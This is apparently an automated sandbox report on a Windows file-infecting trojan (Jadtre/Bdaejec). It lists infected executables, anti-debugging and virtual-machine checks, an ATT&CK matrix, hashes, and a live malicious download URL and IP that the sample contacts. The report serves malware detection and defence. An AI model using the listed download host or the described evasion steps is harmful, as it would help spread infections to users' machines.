Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exe	Dropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_2-1062

Source: C:\Users\user\Desktop\ArjM1qx3hV.exe

Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep

graph_0-6984

Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exe

Code function: 2_2_00BC1718 GetSystemTimeAsFileTime followed by cmp: cmp dword ptr [ebp+08h], 02h and CTI: jne 00BC1754h

2_2_00BC1718

Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exe

Code function: 2_2_00BC29E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,

2_2_00BC29E2

Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exe

Code function: 2_2_00BC2B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread,

2_2_00BC2B8C

Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\	Jump to behavior

Source: Amcache.hve.2.dr	Binary or memory string: VMware
Source: Amcache.hve.2.dr	Binary or memory string: VMware Virtual USB Mouse
Source: lhwmJX.exe, 00000002.00000002.1583940679.00000000004E3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW(dK%SystemRoot%\system32\mswsock.dll
Source: Amcache.hve.2.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.2.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.2.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.2.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.2.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.2.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: lhwmJX.exe, 00000002.00000002.1583940679.00000000004A9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW3
Source: lhwmJX.exe, 00000002.00000002.1583940679.0000000000516000.00000004.00000020.00020000.00000000.sdmp, lhwmJX.exe, 00000002.00000003.1253042614.0000000000516000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.2.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.2.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.2.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.2.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.2.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.2.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.2.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.2.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.2.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.2.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.2.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.2.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.2.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.2.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.2.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.2.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.2.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.2.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.2.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.2.dr	Binary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
Source: Amcache.hve.2.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exe

API call chain: ExitProcess graph end node

graph_2-1036

Source: C:\Users\user\Desktop\ArjM1qx3hV.exe

Code function: 0_2_00401EE2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

0_2_00401EE2

Source: C:\Users\user\Desktop\ArjM1qx3hV.exe

0_2_00409577

Source: C:\Users\user\Desktop\ArjM1qx3hV.exe

Code function: 0_2_00414044 mov eax, dword ptr fs:[00000030h]

0_2_00414044

Source: C:\Users\user\Desktop\ArjM1qx3hV.exe

Code function: 0_2_0040CCDB CreateFileA,__lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,

0_2_0040CCDB

Source: C:\Users\user\Desktop\ArjM1qx3hV.exe	Code function: 0_2_00401EE2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00401EE2
Source: C:\Users\user\Desktop\ArjM1qx3hV.exe	Code function: 0_2_00405FD0 SetUnhandledExceptionFilter,	0_2_00405FD0
Source: C:\Users\user\Desktop\ArjM1qx3hV.exe	Code function: 0_2_004097D7 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,RtlUnwind,	0_2_004097D7
Source: C:\Users\user\Desktop\ArjM1qx3hV.exe	Code function: 0_2_00403594 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00403594

Source: SciTE.exe.2.dr

Binary or memory string: Ctrl+RightLeftDownUpDecimalMinusMultiplyDivideTabSpaceDeleteEscapeEndInsertEnterHomeForwardBackwardPLAT_WIN1PageDownPageUpMenuWinSciTEACCELSSciTEWindowContentSciTEWindowPLAT_WINNT1toolbar.largecreate.hidden.consolegbkbig5euc-krshift_jisutf-8asciilatin2latin1translation.encodingwindows-1251ScaleFactoriso-8859-5cyrillic1250iso8859-11SciTE_HOMEAppsUseLightThemeSciTE_USERHOMESciTE_HOMEPropertiesScaleFactorSoftware\Microsoft\Windows\CurrentVersion\Themes\PersonalizeEmbeddedRich Text FormatButtonShell_TrayWndUSERPROFILESciTE_HOMEHtmlHelpWHHCTRL.OCX

Source: C:\Users\user\Desktop\ArjM1qx3hV.exe

Code function: GetLocaleInfoA,

0_2_0040A79A

Source: C:\Users\user\Desktop\ArjM1qx3hV.exe

Code function: 0_2_00406478 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

0_2_00406478

Source: C:\Users\user\AppData\Local\Temp\lhwmJX.exe

Code function: 2_2_00BC139F GetVersionExA,LookupPrivilegeValueA,GetCurrentProcessId,

2_2_00BC139F

Source: Amcache.hve.2.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.2.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.2.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.2.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.2.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected Bdaejec

Source: Yara match

File source: Process Memory Space: lhwmJX.exe PID: 6052, type: MEMORYSTR

Remote Access Functionality

Yara detected Bdaejec

Source: Yara match

File source: Process Memory Space: lhwmJX.exe PID: 6052, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	3 Native API	1 DLL Side-Loading	1 Access Token Manipulation	1 Masquerading	11 Input Capture	11 System Time Discovery	1 Taint Shared Content	11 Input Capture	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	2 Process Injection	1 Access Token Manipulation	LSASS Memory	131 Security Software Discovery	Remote Desktop Protocol	1 Archive Collected Data	11 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	2 Process Injection	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Deobfuscate/Decode Files or Information	NTDS	3 File and Directory Discovery	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	3 Obfuscated Files or Information	LSA Secrets	13 System Information Discovery	SSH	Keylogging	12 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	12 Software Packing	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
ArjM1qx3hV.exe	86%	Virustotal		Browse
ArjM1qx3hV.exe	95%	ReversingLabs	Win32.Virus.Jadtre
ArjM1qx3hV.exe	100%	Avira	W32/Jadtre.B
ArjM1qx3hV.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Program Files\7-Zip\Uninstall.exe	100%	Avira	W32/Jadtre.B
C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	100%	Avira	W32/Jadtre.B
C:\Users\user\AppData\Local\Temp\lhwmJX.exe	100%	Avira	TR/Dldr.Small.Z.haljq
C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	100%	Avira	W32/Jadtre.B
C:\Program Files\7-Zip\Uninstall.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\lhwmJX.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\lhwmJX.exe	97%	ReversingLabs	Win32.Trojan.Skeeyah

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://www.smartsharesystems.com/Morten	0%	Avira URL Cloud	safe
http://ddos.dnsnb8.net:799/cj//k1.raroC:	100%	Avira URL Cloud	malware
http://www.activestate.com	0%	Avira URL Cloud	safe
http://www.rftp.comJosiah	0%	Avira URL Cloud	safe
http://www.activestate.comHolger	0%	Avira URL Cloud	safe
http://www.develop.com	0%	Avira URL Cloud	safe
http://www.scintilla.org/scite.rng	0%	Avira URL Cloud	safe
http://ddos.dnsnb8.net:799/cj//k1.rarcdp	100%	Avira URL Cloud	malware
http://ddos.dnsnb8.net:799/cj//k1.rars	100%	Avira URL Cloud	malware
http://ddos.dnsnb8.net:799/cj//k1.rar	100%	Avira URL Cloud	malware
http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE	0%	Avira URL Cloud	safe
http://ddos.dnsnb8.net:799/cj//k1.rarp	100%	Avira URL Cloud	malware
http://www.spaceblue.com	0%	Avira URL Cloud	safe
http://www.rftp.com	0%	Avira URL Cloud	safe
http://ddos.dnsnb8.net:799/cj//k1.rarm	100%	Avira URL Cloud	malware
http://www.develop.comDeepak	0%	Avira URL Cloud	safe
http://www.baanboard.com	0%	Avira URL Cloud	safe
http://www.baanboard.comBrendon	0%	Avira URL Cloud	safe
http://ddos.dnsnb8.net:799/cj//k1.rarf	100%	Avira URL Cloud	malware
https://www.smartsharesystems.com/	0%	Avira URL Cloud	safe
http://www.scintilla.org	0%	Avira URL Cloud	safe
http://www.spaceblue.comMathias	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
ddos.dnsnb8.net	44.221.84.105	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://ddos.dnsnb8.net:799/cj//k1.rar	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.smartsharesystems.com/Morten	SciTE.exe.2.dr	false	Avira URL Cloud: safe	unknown
http://ddos.dnsnb8.net:799/cj//k1.raroC:	lhwmJX.exe, 00000002.00000002.1583940679.0000000000516000.00000004.00000020.00020000.00000000.sdmp, lhwmJX.exe, 00000002.00000003.1253042614.0000000000516000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.scintilla.org/scite.rng	SciTE.exe.2.dr	false	Avira URL Cloud: safe	unknown
http://www.develop.com	SciTE.exe.2.dr	false	Avira URL Cloud: safe	unknown
http://www.lua.org	SciTE.exe.2.dr	false		high
http://www.rftp.comJosiah	SciTE.exe.2.dr	false	Avira URL Cloud: safe	unknown
http://www.activestate.com	SciTE.exe.2.dr	false	Avira URL Cloud: safe	unknown
http://www.activestate.comHolger	SciTE.exe.2.dr	false	Avira URL Cloud: safe	unknown
http://ddos.dnsnb8.net:799/cj//k1.rarcdp	lhwmJX.exe, 00000002.00000002.1583940679.000000000048E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://ddos.dnsnb8.net:799/cj//k1.rars	lhwmJX.exe, 00000002.00000003.1253042614.000000000050C000.00000004.00000020.00020000.00000000.sdmp, lhwmJX.exe, 00000002.00000002.1583940679.000000000050C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE	lhwmJX.exe, 00000002.00000002.1584527478.0000000000BC3000.00000002.00000001.01000000.00000004.sdmp, lhwmJX.exe, 00000002.00000003.1232301842.00000000008B0000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.spaceblue.com	SciTE.exe.2.dr	false	Avira URL Cloud: safe	unknown
http://ddos.dnsnb8.net:799/cj//k1.rarp	lhwmJX.exe, 00000002.00000002.1584584545.000000000226A000.00000004.00000010.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://upx.sf.net	Amcache.hve.2.dr	false		high
http://www.baanboard.com	SciTE.exe.2.dr	false	Avira URL Cloud: safe	unknown
http://www.rftp.com	SciTE.exe.2.dr	false	Avira URL Cloud: safe	unknown
http://ddos.dnsnb8.net:799/cj//k1.rarm	lhwmJX.exe, 00000002.00000003.1253042614.000000000050C000.00000004.00000020.00020000.00000000.sdmp, lhwmJX.exe, 00000002.00000002.1583940679.000000000050C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.develop.comDeepak	SciTE.exe.2.dr	false	Avira URL Cloud: safe	unknown
http://www.baanboard.comBrendon	SciTE.exe.2.dr	false	Avira URL Cloud: safe	unknown
http://ddos.dnsnb8.net:799/cj//k1.rarf	lhwmJX.exe, 00000002.00000003.1253042614.000000000050C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.smartsharesystems.com/	SciTE.exe.2.dr	false	Avira URL Cloud: safe	unknown
http://www.scintilla.org	SciTE.exe.2.dr	false	Avira URL Cloud: safe	unknown
http://www.spaceblue.comMathias	SciTE.exe.2.dr	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
44.221.84.105	ddos.dnsnb8.net	United States		14618	AMAZON-AESUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1581655
Start date and time:	2024-12-28 12:25:05 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 34s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	20
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	ArjM1qx3hV.exe renamed because original name is a hash value
Original Sample Name:	2024-12-28_3840cfa13afb95c493fc98d766946229.exe
Detection:	MAL
Classification:	mal100.spre.troj.evad.winEXE@6/12@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 99% Number of executed functions: 19 Number of non-executed functions: 23
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.42.73.29, 40.126.53.18, 13.107.246.63, 4.175.87.197
Excluded domains from analysis (whitelisted): login.live.com, otelrules.azureedge.net, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
08:17:15	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
44.221.84.105	yRc7UfFif9.exe	Get hash	malicious	Bdaejec	Browse	ddos.dnsnb8.net:799/cj//k1.rar
	gT6IitwToH.exe	Get hash	malicious	Bdaejec	Browse	ddos.dnsnb8.net:799/cj//k1.rar
	REQUEST FOR QUOTATION 1307-RFQ.exe	Get hash	malicious	MassLogger RAT	Browse	saytjshyf.biz/xoqfqirqhp
	HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Get hash	malicious	MassLogger RAT	Browse	npukfztj.biz/edmrjb
	http://setup.ghwr87ytiuwhgf4ihsjdnbbdvsh.com	Get hash	malicious	Unknown	Browse	setup.ghwr87ytiuwhgf4ihsjdnbbdvsh.com/favicon.ico
	HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Get hash	malicious	MassLogger RAT	Browse	saytjshyf.biz/eglmpsrvxnyx
	HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Get hash	malicious	MassLogger RAT	Browse	saytjshyf.biz/peioi
	PURCHASE REQUIRED DETAILS 000487958790903403.exe	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse	npukfztj.biz/cbecuogqej
	Ziraat_Swift.hta	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	saytjshyf.biz/bkq
	invoice_96.73.exe	Get hash	malicious	FormBook	Browse	jhvzpcfg.biz/tgcwttfqletfhyq

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ddos.dnsnb8.net	gT6IitwToH.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	#U65b0#U7248#U7f51#U5173.exe	Get hash	malicious	Bdaejec, Neshta, Ramnit	Browse	44.221.84.105
	#U8865#U4e01#U6253#U5305.exe	Get hash	malicious	Bdaejec, Neshta, Ramnit	Browse	44.221.84.105
	#U65b0#U7248#U7f51#U5173Srv.exe	Get hash	malicious	Bdaejec, Neshta, Ramnit	Browse	44.221.84.105
	gE4NVCZDRk.exe	Get hash	malicious	Bdaejec, RunningRAT	Browse	44.221.84.105
	ib.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	1hdqYXYJkr.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	7Y18r(193).exe	Get hash	malicious	Bdaejec, Stealc	Browse	44.221.84.105
	BUG32.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AMAZON-AESUS	aRxo3E278B.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	yRc7UfFif9.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	gT6IitwToH.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	a2mNMrPxow.exe	Get hash	malicious	Unknown	Browse	3.218.7.103
	SgMuuLxOCJ.exe	Get hash	malicious	LummaC	Browse	34.226.108.155
	TNyOrM6mIM.exe	Get hash	malicious	LummaC	Browse	3.218.7.103
	FIyDwZM4OR.exe	Get hash	malicious	Unknown	Browse	3.218.7.103
	ZFttiy4Tt8.exe	Get hash	malicious	Unknown	Browse	3.218.7.103
	e62iSl0abZ.exe	Get hash	malicious	Unknown	Browse	3.218.7.103
	HGFSqmKwd5.exe	Get hash	malicious	Unknown	Browse	34.226.108.155

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\lhwmJX.exe	aRxo3E278B.exe	Get hash	malicious	Bdaejec	Browse
	yRc7UfFif9.exe	Get hash	malicious	Bdaejec	Browse
	gT6IitwToH.exe	Get hash	malicious	Bdaejec	Browse
	#U65b0#U7248#U7f51#U5173.exe	Get hash	malicious	Bdaejec, Neshta, Ramnit	Browse
	#U8865#U4e01#U6253#U5305.exe	Get hash	malicious	Bdaejec, Neshta, Ramnit	Browse
	#U65b0#U7248#U7f51#U5173Srv.exe	Get hash	malicious	Bdaejec, Neshta, Ramnit	Browse
	gE4NVCZDRk.exe	Get hash	malicious	Bdaejec, RunningRAT	Browse
	ib.exe	Get hash	malicious	Bdaejec	Browse
	SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe	Get hash	malicious	Bdaejec	Browse
	8VB4lVuZk3.exe	Get hash	malicious	Bdaejec	Browse

Created / dropped Files

C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\lhwmJX.exe
File Type:	MS-DOS executable PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19456
Entropy (8bit):	6.590528850272501
Encrypted:	false
SSDEEP:	384:1F6S4XZQaD7U8iu4YsAa7ZA0UvH2lsRv21yW7GbAxur6+Y9PffPz:rQQGPL4vzZq2o9W7GsxBbPr
MD5:	6562E367100163BFC7401C8DC09A4D85
SHA1:	77952B60848D77362246116F938F7BED3886E3D2
SHA-256:	5A5026FC40DF76F4FEA9DB8B02395B0A119D0B095520B949C7815EB89F02130C
SHA-512:	0C802D8402813DAD0A0D202FA250C30762FB980DA5734329257DE2BC61C63378C73D23C4AE90098E8997EC498D796C479C296CC52728079CD6C1C0526CFD6694
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ..........................................................@...PE..L....................................0............................................................................................... ..l...........................................................................................................PELIB...............................`....rsrc........ ......................@..@..Y\|.uR..P...0...B.................. ...................................................................................j.h"...h....j...(....Hello World!.MyProg........................................................................................................................................................................................................................(...........0...(.......................;.......User32.dll...MessageBoxA................................................................................................dummy.exe.....................TestExport.CallPlz................

